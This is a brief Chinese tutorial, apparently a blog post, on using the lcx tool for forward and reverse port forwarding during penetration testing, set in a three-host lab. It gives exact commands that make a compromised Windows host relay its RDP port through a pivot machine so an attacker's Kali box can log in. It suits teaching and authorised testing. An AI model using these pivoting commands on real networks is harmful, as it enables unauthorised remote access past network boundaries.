Lcx是一款端口转发工具,可以将内网机器的端口映射到带公网IP的机器上。一般进行渗透的时候,通过web漏洞getshell之后,需要对其进行远程登录,这就需要用到端口映射。

环境介绍

Win7：192.168.10.10

Win10：192.168.10.30

Kali：192.168.10.20

正向端口转发

终端上执行lcx命令，让本机指定端口的流量全部转发到远程主机指定IP指定端口上。然后通过本地指定端口，访问远程主机指定端口。

192.168.10.30主机上执行下列命令，将其1234端口流量全部转发到主机192.168.10.10的3389端口

# lcx.exe -tran LocalPort RemoteHost RemotePOrt 
lcx.exe -tran 1234 192.168.10.10 3389

192.168.10.30通过1234端口远程桌面登录192.168.10.10主机。

反向端口转发

kali机以Win7主机为跳板远程登录Win10主机

1）将外网服务器Win7上的9000端口流量转发到该机的9001端口，Win7上执行：

#lcx.exe -listen SourcePort  TargetPort
lcx.exe -listen 9000 9001

2）将被控服务器Win10主机流量转发到外网服务器Win7，Win10上执行：

# lcx.exe -slave RemoteHost RemotePort LocalHost LocalPort
lcx.exe -slave 192.168.10.10 9000 127.0.0.1 3389

3）kali攻击机通过远程访问外网服务器Win7的9000端口，远程登录Win10主机，kali上执行：

# rdesktop host:port
rdesktop 192.168.10.10:9001

执行命令弹出远程登录框，输入账号和密码，即可完成对Win10的远程登录：

这样，攻击机kali在没有无法访问靶机Win10的情况下，通过端口转发和二者共同可以访问的外网主机Win7，远程登录靶机。

备注

在执行lcx.exe命令过程中，注意打印的提示内容，显示端口网络连接情况